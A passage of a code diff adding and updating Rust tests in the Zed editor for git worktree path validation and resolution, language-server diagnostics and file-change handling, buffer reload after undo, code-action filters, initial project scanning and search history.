use serde_json::json;
use settings::SettingsStore;
+ use std::path::{Path, PathBuf};
use util::path;
-
fn init_test(cx: &mut gpui::TestAppContext) {
zlog::init_test();
@@ -1193,6 +1192,48 @@ mod git_worktrees {
});
}
+ #[test]
+ fn test_validate_worktree_directory() {
+ let work_dir = Path::new("/code/my-project");
+
+ // Valid: sibling
+ assert!(worktrees_directory_for_repo(work_dir, "../worktrees").is_ok());
+
+ // Valid: subdirectory
+ assert!(worktrees_directory_for_repo(work_dir, ".git/zed-worktrees").is_ok());
+ assert!(worktrees_directory_for_repo(work_dir, "my-worktrees").is_ok());
+
+ // Invalid: just ".." would resolve back to the working directory itself
+ let err = worktrees_directory_for_repo(work_dir, "..").unwrap_err();
+ assert!(err.to_string().contains("must not be \"..\""));
+
+ // Invalid: ".." with trailing separators
+ let err = worktrees_directory_for_repo(work_dir, "..\\").unwrap_err();
+ assert!(err.to_string().contains("must not be \"..\""));
+ let err = worktrees_directory_for_repo(work_dir, "../").unwrap_err();
+ assert!(err.to_string().contains("must not be \"..\""));
+
+ // Invalid: empty string would resolve to the working directory itself
+ let err = worktrees_directory_for_repo(work_dir, "").unwrap_err();
+ assert!(err.to_string().contains("must not be empty"));
+
+ // Invalid: absolute path
+ let err = worktrees_directory_for_repo(work_dir, "/tmp/worktrees").unwrap_err();
+ assert!(err.to_string().contains("relative path"));
+
+ // Invalid: "/" is absolute on Unix
+ let err = worktrees_directory_for_repo(work_dir, "/").unwrap_err();
+ assert!(err.to_string().contains("relative path"));
+
+ // Invalid: "///" is absolute
+ let err = worktrees_directory_for_repo(work_dir, "///").unwrap_err();
+ assert!(err.to_string().contains("relative path"));
+
+ // Invalid: escapes too far up
+ let err = worktrees_directory_for_repo(work_dir, "../../other-project/wt").unwrap_err();
+ assert!(err.to_string().contains("outside"));
+ }
+
#[gpui::test]
async fn test_git_worktrees_list_and_create(cx: &mut TestAppContext) {
init_test(cx);
@@ -1221,12 +1262,13 @@ mod git_worktrees {
assert_eq!(worktrees.len(), 1);
assert_eq!(worktrees[0].path, PathBuf::from(path!("/root")));
- let worktree_directory = PathBuf::from(path!("/root"));
+ let worktrees_directory = PathBuf::from(path!("/root"));
+ let worktree_1_directory = worktrees_directory.join("feature-branch");
cx.update(|cx| {
repository.update(cx, |repository, _| {
repository.create_worktree(
"feature-branch".to_string(),
- worktree_directory.clone(),
+ worktree_1_directory.clone(),
Some("abc123".to_string()),
)
})
@@ -1244,15 +1286,19 @@ mod git_worktrees {
.unwrap();
assert_eq!(worktrees.len(), 2);
assert_eq!(worktrees[0].path, PathBuf::from(path!("/root")));
- assert_eq!(worktrees[1].path, worktree_directory.join("feature-branch"));
- assert_eq!(worktrees[1].ref_name.as_ref(), "refs/heads/feature-branch");
+ assert_eq!(worktrees[1].path, worktree_1_directory);
+ assert_eq!(
+ worktrees[1].ref_name,
+ Some("refs/heads/feature-branch".into())
+ );
assert_eq!(worktrees[1].sha.as_ref(), "abc123");
+ let worktree_2_directory = worktrees_directory.join("bugfix-branch");
cx.update(|cx| {
repository.update(cx, |repository, _| {
repository.create_worktree(
"bugfix-branch".to_string(),
- worktree_directory.clone(),
+ worktree_2_directory.clone(),
None,
)
})
@@ -1271,24 +1317,18 @@ mod git_worktrees {
.unwrap();
assert_eq!(worktrees.len(), 3);
- let feature_worktree = worktrees
+ let worktree_1 = worktrees
.iter()
- .find(|worktree| worktree.ref_name.as_ref() == "refs/heads/feature-branch")
+ .find(|worktree| worktree.ref_name == Some("refs/heads/feature-branch".into()))
.expect("should find feature-branch worktree");
- assert_eq!(
- feature_worktree.path,
- worktree_directory.join("feature-branch")
- );
+ assert_eq!(worktree_1.path, worktree_1_directory);
- let bugfix_worktree = worktrees
+ let worktree_2 = worktrees
.iter()
- .find(|worktree| worktree.ref_name.as_ref() == "refs/heads/bugfix-branch")
+ .find(|worktree| worktree.ref_name == Some("refs/heads/bugfix-branch".into()))
.expect("should find bugfix-branch worktree");
- assert_eq!(
- bugfix_worktree.path,
- worktree_directory.join("bugfix-branch")
- );
- assert_eq!(bugfix_worktree.sha.as_ref(), "fake-sha");
+ assert_eq!(worktree_2.path, worktree_2_directory);
+ assert_eq!(worktree_2.sha.as_ref(), "fake-sha");
}
use crate::Project;
@@ -1498,3 +1538,113 @@ mod trust_tests {
});
}
}
+
+mod resolve_worktree_tests {
+ use fs::FakeFs;
+ use gpui::TestAppContext;
+ use project::{git_store::resolve_git_worktree_to_main_repo, linked_worktree_short_name};
+ use serde_json::json;
+ use std::path::{Path, PathBuf};
+
+ #[gpui::test]
+ async fn test_resolve_git_worktree_to_main_repo(cx: &mut TestAppContext) {
+ let fs = FakeFs::new(cx.executor());
+ // Set up a main repo with a worktree entry
+ fs.insert_tree(
+ "/main-repo",
+ json!({
+ ".git": {
+ "worktrees": {
+ "feature": {
+ "commondir": "../../",
+ "HEAD": "ref: refs/heads/feature"
+ }
+ }
+ },
+ "src": { "main.rs": "" }
+ }),
+ )
+ .await;
+ // Set up a worktree checkout pointing back to the main repo
+ fs.insert_tree(
+ "/worktree-checkout",
+ json!({
+ ".git": "gitdir: /main-repo/.git/worktrees/feature",
+ "src": { "main.rs": "" }
+ }),
+ )
+ .await;
+
+ let result =
+ resolve_git_worktree_to_main_repo(fs.as_ref(), Path::new("/worktree-checkout")).await;
+ assert_eq!(result, Some(PathBuf::from("/main-repo")));
+ }
+
+ #[gpui::test]
+ async fn test_resolve_git_worktree_normal_repo_returns_none(cx: &mut TestAppContext) {
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/repo",
+ json!({
+ ".git": {},
+ "src": { "main.rs": "" }
+ }),
+ )
+ .await;
+
+ let result = resolve_git_worktree_to_main_repo(fs.as_ref(), Path::new("/repo")).await;
+ assert_eq!(result, None);
+ }
+
+ #[gpui::test]
+ async fn test_resolve_git_worktree_no_git_returns_none(cx: &mut TestAppContext) {
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/plain",
+ json!({
+ "src": { "main.rs": "" }
+ }),
+ )
+ .await;
+
+ let result = resolve_git_worktree_to_main_repo(fs.as_ref(), Path::new("/plain")).await;
+ assert_eq!(result, None);
+ }
+
+ #[gpui::test]
+ async fn test_resolve_git_worktree_nonexistent_returns_none(cx: &mut TestAppContext) {
+ let fs = FakeFs::new(cx.executor());
+
+ let result =
+ resolve_git_worktree_to_main_repo(fs.as_ref(), Path::new("/does-not-exist")).await;
+ assert_eq!(result, None);
+ }
+
+ #[test]
+ fn test_linked_worktree_short_name() {
+ let examples = [
+ (
+ "/home/bob/zed",
+ "/home/bob/worktrees/olivetti/zed",
+ Some("olivetti".into()),
+ ),
+ ("/home/bob/zed", "/home/bob/zed2", Some("zed2".into())),
+ (
+ "/home/bob/zed",
+ "/home/bob/worktrees/zed/selectric",
+ Some("selectric".into()),
+ ),
+ ("/home/bob/zed", "/home/bob/zed", None),
+ ];
+ for (main_worktree_path, linked_worktree_path, expected) in examples {
+ let short_name = linked_worktree_short_name(
+ Path::new(main_worktree_path),
+ Path::new(linked_worktree_path),
+ );
+ assert_eq!(
+ short_name, expected,
+ "short name for {linked_worktree_path:?}, linked worktree of {main_worktree_path:?}, should be {expected:?}"
+ );
+ }
+ }
+}
@@ -26,7 +26,7 @@ use buffer_diff::{
};
use collections::{BTreeSet, HashMap, HashSet};
use encoding_rs;
-use fs::FakeFs;
+use fs::{FakeFs, PathEventKind};
use futures::{StreamExt, future};
use git::{
GitHostingProviderRegistry,
@@ -76,7 +76,7 @@ use std::{
path::{Path, PathBuf},
rc::Rc,
str::FromStr,
- sync::{Arc, OnceLock},
+ sync::{Arc, OnceLock, atomic},
task::Poll,
time::Duration,
};
@@ -126,6 +126,63 @@ async fn test_block_via_smol(cx: &mut gpui::TestAppContext) {
task.await;
}
+#[gpui::test]
+async fn test_default_session_work_dirs_prefers_directory_worktrees_over_single_file_parents(
+ cx: &mut gpui::TestAppContext,
+) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ path!("/root"),
+ json!({
+ "dir-project": {
+ "src": {
+ "main.rs": "fn main() {}"
+ }
+ },
+ "single-file.rs": "fn helper() {}"
+ }),
+ )
+ .await;
+
+ let project = Project::test(
+ fs,
+ [
+ Path::new(path!("/root/single-file.rs")),
+ Path::new(path!("/root/dir-project")),
+ ],
+ cx,
+ )
+ .await;
+
+ let work_dirs = project.read_with(cx, |project, cx| project.default_path_list(cx));
+ let ordered_paths = work_dirs.ordered_paths().cloned().collect::<Vec<_>>();
+
+ assert_eq!(
+ ordered_paths,
+ vec![
+ PathBuf::from(path!("/root/dir-project")),
+ PathBuf::from(path!("/root")),
+ ]
+ );
+}
+
+#[gpui::test]
+async fn test_default_session_work_dirs_falls_back_to_home_for_empty_project(
+ cx: &mut gpui::TestAppContext,
+) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ let project = Project::test(fs, [], cx).await;
+
+ let work_dirs = project.read_with(cx, |project, cx| project.default_path_list(cx));
+ let ordered_paths = work_dirs.ordered_paths().cloned().collect::<Vec<_>>();
+
+ assert_eq!(ordered_paths, vec![paths::home_dir().to_path_buf()]);
+}
+
// NOTE:
// While POSIX symbolic links are somewhat supported on Windows, they are an opt in by the user, and thus
// we assume that they are not supported out of the box.
@@ -2072,6 +2129,97 @@ async fn test_language_server_tilde_path(cx: &mut gpui::TestAppContext) {
);
}
+#[gpui::test]
+async fn test_rescan_fs_change_is_reported_to_language_servers_as_changed(
+ cx: &mut gpui::TestAppContext,
+) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ path!("/the-root"),
+ json!({
+ "Cargo.lock": "",
+ "src": {
+ "a.rs": "",
+ }
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), [path!("/the-root").as_ref()], cx).await;
+ let (language_registry, _lsp_store) = project.read_with(cx, |project, _| {
+ (project.languages().clone(), project.lsp_store())
+ });
+ language_registry.add(rust_lang());
+ let mut fake_servers = language_registry.register_fake_lsp(
+ "Rust",
+ FakeLspAdapter {
+ name: "the-language-server",
+ ..Default::default()
+ },
+ );
+
+ cx.executor().run_until_parked();
+
+ project
+ .update(cx, |project, cx| {
+ project.open_local_buffer_with_lsp(path!("/the-root/src/a.rs"), cx)
+ })
+ .await
+ .unwrap();
+
+ let fake_server = fake_servers.next().await.unwrap();
+ cx.executor().run_until_parked();
+
+ let file_changes = Arc::new(Mutex::new(Vec::new()));
+ fake_server
+ .request::<lsp::request::RegisterCapability>(
+ lsp::RegistrationParams {
+ registrations: vec![lsp::Registration {
+ id: Default::default(),
+ method: "workspace/didChangeWatchedFiles".to_string(),
+ register_options: serde_json::to_value(
+ lsp::DidChangeWatchedFilesRegistrationOptions {
+ watchers: vec![lsp::FileSystemWatcher {
+ glob_pattern: lsp::GlobPattern::String(
+ path!("/the-root/Cargo.lock").to_string(),
+ ),
+ kind: None,
+ }],
+ },
+ )
+ .ok(),
+ }],
+ },
+ DEFAULT_LSP_REQUEST_TIMEOUT,
+ )
+ .await
+ .into_response()
+ .unwrap();
+ fake_server.handle_notification::<lsp::notification::DidChangeWatchedFiles, _>({
+ let file_changes = file_changes.clone();
+ move |params, _| {
+ let mut file_changes = file_changes.lock();
+ file_changes.extend(params.changes);
+ }
+ });
+
+ cx.executor().run_until_parked();
+ assert_eq!(mem::take(&mut *file_changes.lock()), &[]);
+
+ fs.emit_fs_event(path!("/the-root/Cargo.lock"), Some(PathEventKind::Rescan));
+ cx.executor().run_until_parked();
+
+ assert_eq!(
+ &*file_changes.lock(),
+ &[lsp::FileEvent {
+ uri: lsp::Uri::from_file_path(path!("/the-root/Cargo.lock")).unwrap(),
+ typ: lsp::FileChangeType::CHANGED,
+ }]
+ );
+}
+
#[gpui::test]
async fn test_reporting_fs_changes_to_language_servers(cx: &mut gpui::TestAppContext) {
init_test(cx);
@@ -3610,6 +3758,266 @@ async fn test_diagnostics_from_multiple_language_servers(cx: &mut gpui::TestAppC
});
}
+#[gpui::test]
+async fn test_diagnostic_summaries_cleared_on_worktree_entry_removal(
+ cx: &mut gpui::TestAppContext,
+) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(path!("/dir"), json!({ "a.rs": "one", "b.rs": "two" }))
+ .await;
+
+ let project = Project::test(fs.clone(), [Path::new(path!("/dir"))], cx).await;
+ let lsp_store = project.read_with(cx, |project, _| project.lsp_store());
+
+ lsp_store.update(cx, |lsp_store, cx| {
+ lsp_store
+ .update_diagnostic_entries(
+ LanguageServerId(0),
+ Path::new(path!("/dir/a.rs")).to_owned(),
+ None,
+ None,
+ vec![DiagnosticEntry {
+ range: Unclipped(PointUtf16::new(0, 0))..Unclipped(PointUtf16::new(0, 3)),
+ diagnostic: Diagnostic {
+ severity: DiagnosticSeverity::ERROR,
+ is_primary: true,
+ message: "error in a".to_string(),
+ source_kind: DiagnosticSourceKind::Pushed,
+ ..Diagnostic::default()
+ },
+ }],
+ cx,
+ )
+ .unwrap();
+ lsp_store
+ .update_diagnostic_entries(
+ LanguageServerId(0),
+ Path::new(path!("/dir/b.rs")).to_owned(),
+ None,
+ None,
+ vec![DiagnosticEntry {
+ range: Unclipped(PointUtf16::new(0, 0))..Unclipped(PointUtf16::new(0, 3)),
+ diagnostic: Diagnostic {
+ severity: DiagnosticSeverity::WARNING,
+ is_primary: true,
+ message: "warning in b".to_string(),
+ source_kind: DiagnosticSourceKind::Pushed,
+ ..Diagnostic::default()
+ },
+ }],
+ cx,
+ )
+ .unwrap();
+
+ assert_eq!(
+ lsp_store.diagnostic_summary(false, cx),
+ DiagnosticSummary {
+ error_count: 1,
+ warning_count: 1,
+ }
+ );
+ });
+
+ fs.remove_file(path!("/dir/a.rs").as_ref(), Default::default())
+ .await
+ .unwrap();
+ cx.executor().run_until_parked();
+
+ lsp_store.update(cx, |lsp_store, cx| {
+ assert_eq!(
+ lsp_store.diagnostic_summary(false, cx),
+ DiagnosticSummary {
+ error_count: 0,
+ warning_count: 1,
+ },
+ );
+ });
+}
+
+#[gpui::test]
+async fn test_diagnostic_summaries_cleared_on_server_restart(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(path!("/dir"), json!({ "a.rs": "x" })).await;
+
+ let project = Project::test(fs, [path!("/dir").as_ref()], cx).await;
+
+ let language_registry = project.read_with(cx, |project, _| project.languages().clone());
+ language_registry.add(rust_lang());
+ let mut fake_servers = language_registry.register_fake_lsp("Rust", FakeLspAdapter::default());
+
+ let (buffer, _handle) = project
+ .update(cx, |project, cx| {
+ project.open_local_buffer_with_lsp(path!("/dir/a.rs"), cx)
+ })
+ .await
+ .unwrap();
+
+ let fake_server = fake_servers.next().await.unwrap();
+ fake_server.notify::<lsp::notification::PublishDiagnostics>(lsp::PublishDiagnosticsParams {
+ uri: Uri::from_file_path(path!("/dir/a.rs")).unwrap(),
+ version: None,
+ diagnostics: vec![lsp::Diagnostic {
+ range: lsp::Range::new(lsp::Position::new(0, 0), lsp::Position::new(0, 1)),
+ severity: Some(lsp::DiagnosticSeverity::ERROR),
+ message: "error before restart".to_string(),
+ ..Default::default()
+ }],
+ });
+ cx.executor().run_until_parked();
+
+ project.update(cx, |project, cx| {
+ assert_eq!(
+ project.diagnostic_summary(false, cx),
+ DiagnosticSummary {
+ error_count: 1,
+ warning_count: 0,
+ }
+ );
+ });
+
+ let mut events = cx.events(&project);
+
+ project.update(cx, |project, cx| {
+ project.restart_language_servers_for_buffers(vec![buffer.clone()], HashSet::default(), cx);
+ });
+ cx.executor().run_until_parked();
+
+ let mut received_diagnostics_updated = false;
+ while let Some(Some(event)) =
+ futures::FutureExt::now_or_never(futures::StreamExt::next(&mut events))
+ {
+ if matches!(event, Event::DiagnosticsUpdated { .. }) {
+ received_diagnostics_updated = true;
+ }
+ }
+ assert!(
+ received_diagnostics_updated,
+ "DiagnosticsUpdated event should be emitted when a language server is stopped"
+ );
+
+ project.update(cx, |project, cx| {
+ assert_eq!(
+ project.diagnostic_summary(false, cx),
+ DiagnosticSummary {
+ error_count: 0,
+ warning_count: 0,
+ }
+ );
+ });
+}
+
+#[gpui::test]
+async fn test_diagnostic_summaries_cleared_on_buffer_reload(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(path!("/dir"), json!({ "a.rs": "one two three" }))
+ .await;
+
+ let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await;
+
+ let language_registry = project.read_with(cx, |project, _| project.languages().clone());
+ language_registry.add(rust_lang());
+ let pull_count = Arc::new(atomic::AtomicUsize::new(0));
+ let closure_pull_count = pull_count.clone();
+ let mut fake_servers = language_registry.register_fake_lsp(
+ "Rust",
+ FakeLspAdapter {
+ capabilities: lsp::ServerCapabilities {
+ diagnostic_provider: Some(lsp::DiagnosticServerCapabilities::Options(
+ lsp::DiagnosticOptions {
+ identifier: Some("test-reload".to_string()),
+ inter_file_dependencies: true,
+ workspace_diagnostics: false,
+ work_done_progress_options: Default::default(),
+ },
+ )),
+ ..lsp::ServerCapabilities::default()
+ },
+ initializer: Some(Box::new(move |fake_server| {
+ let pull_count = closure_pull_count.clone();
+ fake_server.set_request_handler::<lsp::request::DocumentDiagnosticRequest, _, _>(
+ move |_, _| {
+ let pull_count = pull_count.clone();
+ async move {
+ pull_count.fetch_add(1, atomic::Ordering::SeqCst);
+ Ok(lsp::DocumentDiagnosticReportResult::Report(
+ lsp::DocumentDiagnosticReport::Full(
+ lsp::RelatedFullDocumentDiagnosticReport {
+ related_documents: None,
+ full_document_diagnostic_report:
+ lsp::FullDocumentDiagnosticReport {
+ result_id: None,
+ items: Vec::new(),
+ },
+ },
+ ),
+ ))
+ }
+ },
+ );
+ })),
+ ..FakeLspAdapter::default()
+ },
+ );
+
+ let (_buffer, _handle) = project
+ .update(cx, |project, cx| {
+ project.open_local_buffer_with_lsp(path!("/dir/a.rs"), cx)
+ })
+ .await
+ .unwrap();
+
+ let fake_server = fake_servers.next().await.unwrap();
+ cx.executor().run_until_parked();
+
+ // Publish initial diagnostics via the fake server.
+ fake_server.notify::<lsp::notification::PublishDiagnostics>(lsp::PublishDiagnosticsParams {
+ uri: Uri::from_file_path(path!("/dir/a.rs")).unwrap(),
+ version: None,
+ diagnostics: vec![lsp::Diagnostic {
+ range: lsp::Range::new(lsp::Position::new(0, 0), lsp::Position::new(0, 3)),
+ severity: Some(lsp::DiagnosticSeverity::ERROR),
+ message: "error in a".to_string(),
+ ..Default::default()
+ }],
+ });
+ cx.executor().run_until_parked();
+
+ project.update(cx, |project, cx| {
+ assert_eq!(
+ project.diagnostic_summary(false, cx),
+ DiagnosticSummary {
+ error_count: 1,
+ warning_count: 0,
+ }
+ );
+ });
+
+ let pulls_before = pull_count.load(atomic::Ordering::SeqCst);
+
+ // Change the file on disk. The FS event triggers buffer reload,
+ // which in turn triggers pull_diagnostics_for_buffer.
+ fs.save(
+ path!("/dir/a.rs").as_ref(),
+ &"fixed content".into(),
+ LineEnding::Unix,
+ )
+ .await
+ .unwrap();
+ cx.executor().run_until_parked();
+
+ let pulls_after = pull_count.load(atomic::Ordering::SeqCst);
+ assert!(
+ pulls_after > pulls_before,
+ "Expected document diagnostic pull after buffer reload (before={pulls_before}, after={pulls_after})"
+ );
+}
+
#[gpui::test]
async fn test_edits_from_lsp2_with_past_version(cx: &mut gpui::TestAppContext) {
init_test(cx);
@@ -5552,7 +5960,7 @@ async fn test_buffer_is_dirty(cx: &mut gpui::TestAppContext) {
assert_eq!(
*events.lock(),
&[
- language::BufferEvent::Edited,
+ language::BufferEvent::Edited { is_local: true },
language::BufferEvent::DirtyChanged
]
);
@@ -5581,9 +5989,9 @@ async fn test_buffer_is_dirty(cx: &mut gpui::TestAppContext) {
assert_eq!(
*events.lock(),
&[
- language::BufferEvent::Edited,
+ language::BufferEvent::Edited { is_local: true },
language::BufferEvent::DirtyChanged,
- language::BufferEvent::Edited,
+ language::BufferEvent::Edited { is_local: true },
],
);
events.lock().clear();
@@ -5598,7 +6006,7 @@ async fn test_buffer_is_dirty(cx: &mut gpui::TestAppContext) {
assert_eq!(
*events.lock(),
&[
- language::BufferEvent::Edited,
+ language::BufferEvent::Edited { is_local: true },
language::BufferEvent::DirtyChanged
]
);
@@ -5638,7 +6046,7 @@ async fn test_buffer_is_dirty(cx: &mut gpui::TestAppContext) {
assert_eq!(
mem::take(&mut *events.lock()),
&[
- language::BufferEvent::Edited,
+ language::BufferEvent::Edited { is_local: true },
language::BufferEvent::DirtyChanged
]
);
@@ -5653,7 +6061,7 @@ async fn test_buffer_is_dirty(cx: &mut gpui::TestAppContext) {
assert_eq!(
*events.lock(),
&[
- language::BufferEvent::Edited,
+ language::BufferEvent::Edited { is_local: true },
language::BufferEvent::DirtyChanged
]
);
@@ -5687,6 +6095,75 @@ async fn test_buffer_is_dirty(cx: &mut gpui::TestAppContext) {
cx.update(|cx| assert!(buffer3.read(cx).is_dirty()));
}
+#[gpui::test]
+async fn test_dirty_buffer_reloads_after_undo(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ path!("/dir"),
+ json!({
+ "file.txt": "version 1",
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await;
+ let buffer = project
+ .update(cx, |p, cx| p.open_local_buffer(path!("/dir/file.txt"), cx))
+ .await
+ .unwrap();
+
+ buffer.read_with(cx, |buffer, _| {
+ assert_eq!(buffer.text(), "version 1");
+ assert!(!buffer.is_dirty());
+ });
+
+ // User makes an edit, making the buffer dirty.
+ buffer.update(cx, |buffer, cx| {
+ buffer.edit([(0..0, "user edit: ")], None, cx);
+ });
+
+ buffer.read_with(cx, |buffer, _| {
+ assert!(buffer.is_dirty());
+ assert_eq!(buffer.text(), "user edit: version 1");
+ });
+
+ // External tool writes new content while buffer is dirty.
+ // file_updated() updates the File but suppresses ReloadNeeded.
+ fs.save(
+ path!("/dir/file.txt").as_ref(),
+ &"version 2 from external tool".into(),
+ Default::default(),
+ )
+ .await
+ .unwrap();
+ cx.executor().run_until_parked();
+
+ buffer.read_with(cx, |buffer, _| {
+ assert!(buffer.has_conflict());
+ assert_eq!(buffer.text(), "user edit: version 1");
+ });
+
+ // User undoes their edit. Buffer becomes clean, but disk has different
+ // content. did_edit() detects the dirty->clean transition and checks if
+ // disk changed while dirty. Since mtime differs from saved_mtime, it
+ // emits ReloadNeeded.
+ buffer.update(cx, |buffer, cx| {
+ buffer.undo(cx);
+ });
+ cx.executor().run_until_parked();
+
+ buffer.read_with(cx, |buffer, _| {
+ assert_eq!(
+ buffer.text(),
+ "version 2 from external tool",
+ "buffer should reload from disk after undo makes it clean"
+ );
+ assert!(!buffer.is_dirty());
+ });
+}
+
#[gpui::test]
async fn test_buffer_file_changes_on_disk(cx: &mut gpui::TestAppContext) {
init_test(cx);
@@ -7595,6 +8072,92 @@ async fn test_code_actions_only_kinds(cx: &mut gpui::TestAppContext) {
);
}
+#[gpui::test]
+async fn test_code_actions_without_requested_kinds_do_not_send_only_filter(
+ cx: &mut gpui::TestAppContext,
+) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ path!("/dir"),
+ json!({
+ "a.ts": "a",
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs, [path!("/dir").as_ref()], cx).await;
+
+ let language_registry = project.read_with(cx, |project, _| project.languages().clone());
+ language_registry.add(typescript_lang());
+ let mut fake_language_servers = language_registry.register_fake_lsp(
+ "TypeScript",
+ FakeLspAdapter {
+ capabilities: lsp::ServerCapabilities {
+ code_action_provider: Some(lsp::CodeActionProviderCapability::Options(
+ lsp::CodeActionOptions {
+ code_action_kinds: Some(vec![
+ CodeActionKind::SOURCE_ORGANIZE_IMPORTS,
+ "source.doc".into(),
+ ]),
+ ..lsp::CodeActionOptions::default()
+ },
+ )),
+ ..lsp::ServerCapabilities::default()
+ },
+ ..FakeLspAdapter::default()
+ },
+ );
+
+ let (buffer, _handle) = project
+ .update(cx, |p, cx| {
+ p.open_local_buffer_with_lsp(path!("/dir/a.ts"), cx)
+ })
+ .await
+ .unwrap();
+ cx.executor().run_until_parked();
+
+ let fake_server = fake_language_servers
+ .next()
+ .await
+ .expect("failed to get the language server");
+
+ let mut request_handled = fake_server.set_request_handler::<
+ lsp::request::CodeActionRequest,
+ _,
+ _,
+ >(move |params, _| async move {
+ assert_eq!(
+ params.context.only, None,
+ "Code action requests without explicit kind filters should not send `context.only`"
+ );
+ Ok(Some(vec![lsp::CodeActionOrCommand::CodeAction(
+ lsp::CodeAction {
+ title: "Add test".to_string(),
+ kind: Some("source.addTest".into()),
+ ..lsp::CodeAction::default()
+ },
+ )]))
+ });
+
+ let code_actions_task = project.update(cx, |project, cx| {
+ project.code_actions(&buffer, 0..buffer.read(cx).len(), None, cx)
+ });
+
+ let () = request_handled
+ .next()
+ .await
+ .expect("The code action request should have been triggered");
+
+ let code_actions = code_actions_task.await.unwrap().unwrap();
+ assert_eq!(code_actions.len(), 1);
+ assert_eq!(
+ code_actions[0].lsp_action.action_kind(),
+ Some("source.addTest".into())
+ );
+}
+
#[gpui::test]
async fn test_multiple_language_server_actions(cx: &mut gpui::TestAppContext) {
init_test(cx);
@@ -11320,6 +11883,77 @@ async fn test_undo_encoding_change(cx: &mut gpui::TestAppContext) {
});
}
+#[gpui::test]
+async fn test_initial_scan_complete(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ path!("/root"),
+ json!({
+ "a": {
+ ".git": {},
+ ".zed": {
+ "tasks.json": r#"[{"label": "task-a", "command": "echo a"}]"#
+ },
+ "src": { "main.rs": "" }
+ },
+ "b": {
+ ".git": {},
+ ".zed": {
+ "tasks.json": r#"[{"label": "task-b", "command": "echo b"}]"#
+ },
+ "src": { "lib.rs": "" }
+ },
+ }),
+ )
+ .await;
+
+ let repos_created = Rc::new(RefCell::new(Vec::new()));
+ let _observe = {
+ let repos_created = repos_created.clone();
+ cx.update(|cx| {
+ cx.observe_new::<Repository>(move |repo, _, cx| {
+ repos_created.borrow_mut().push(cx.entity().downgrade());
+ let _ = repo;
+ })
+ })
+ };
+
+ let project = Project::test(
+ fs.clone(),
+ [path!("/root/a").as_ref(), path!("/root/b").as_ref()],
+ cx,
+ )
+ .await;
+
+ let scan_complete = project.read_with(cx, |project, cx| project.wait_for_initial_scan(cx));
+ scan_complete.await;
+
+ project.read_with(cx, |project, cx| {
+ assert!(
+ project.worktree_store().read(cx).initial_scan_completed(),
+ "Expected initial scan to be completed after awaiting wait_for_initial_scan"
+ );
+ });
+
+ let created_repos_len = repos_created.borrow().len();
+ assert_eq!(
+ created_repos_len, 2,
+ "Expected 2 repositories to be created during scan, got {}",
+ created_repos_len
+ );
+
+ project.read_with(cx, |project, cx| {
+ let git_store = project.git_store().read(cx);
+ assert_eq!(
+ git_store.repositories().len(),
+ 2,
+ "Expected 2 repositories in GitStore"
+ );
+ });
+}
+
pub fn init_test(cx: &mut gpui::TestAppContext) {
zlog::init_test();
@@ -38,7 +38,7 @@ fn test_add() {
// add item when it equals to current item if it's not the last one
search_history.add(&mut cursor, "php".to_string());
- search_history.previous(&mut cursor);
+ search_history.previous(&mut cursor, "");
assert_eq!(search_history.current(&cursor), Some("rustlang"));
search_history.add(&mut cursor, "rustlang".to_string());
assert_eq!(search_history.len(), 3, "Should add item");
@@ -71,13 +71,13 @@ fn test_next_and_previous() {
assert_eq!(search_history.current(&cursor), Some("TypeScript"));
- assert_eq!(search_history.previous(&mut cursor), Some("JavaScript"));
+ assert_eq!(search_history.previous(&mut cursor, ""), Some("JavaScript"));
assert_eq!(search_history.current(&cursor), Some("JavaScript"));
- assert_eq!(search_history.previous(&mut cursor), Some("Rust"));
+ assert_eq!(search_history.previous(&mut cursor, ""), Some("Rust"));
assert_eq!(search_history.current(&cursor), Some("Rust"));
- assert_eq!(search_history.previous(&mut cursor), None);
+ assert_eq!(search_history.previous(&mut cursor, ""), None);
assert_eq!(search_history.current(&cursor), Some("Rust"));
assert_eq!(search_history.next(&mut cursor), Some("JavaScript"));
@@ -103,14 +103,14 @@ fn test_reset_selection() {
cursor.reset();
assert_eq!(search_history.current(&cursor), None);
assert_eq!(
- search_history.previous(&mut cursor),
+ search_history.previous(&mut cursor, ""),
Some("TypeScript"),
"Should start from the end after reset on previous item query"
);
- search_history.previous(&mut cursor);
+ search_history.previous(&mut cursor, "");
assert_eq!(search_history.current(&cursor), Some("JavaScript"));
- search_history.previous(&mut cursor);
+ search_history.previous(&mut cursor, "");
assert_eq!(search_history.current(&cursor), Some("Rust"));
cursor.reset();
@@ -134,8 +134,11 @@ fn test_multiple_cursors() {
assert_eq!(search_history.current(&cursor1), Some("TypeScript"));
assert_eq!(search_history.current(&cursor2), Some("C++"));
- assert_eq!(search_history.previous(&mut cursor1), Some("JavaScript"));
- assert_eq!(search_history.previous(&mut cursor2), Some("Java"));
+ assert_eq!(
+ search_history.previous(&mut cursor1, ""),
+ Some("JavaScript")
+ );
+ assert_eq!(search_history.previous(&mut cursor2, ""), Some("Java"));
assert_eq!(search_history.next(&mut cursor1), Some("TypeScript"));
assert_eq!(search_history.next(&mut cursor1), Some("Python"));
@@ -47,6 +47,7 @@ language.workspace = true
zed_actions.workspace = true
telemetry.workspace = true
notifications.workspace = true
+feature_flags.workspace = true
[dev-dependencies]
client = { workspace = true, features = ["test-support"] }
@@ -54,6 +55,7 @@ criterion.workspace = true
editor = { workspace = true, features = ["test-support"] }
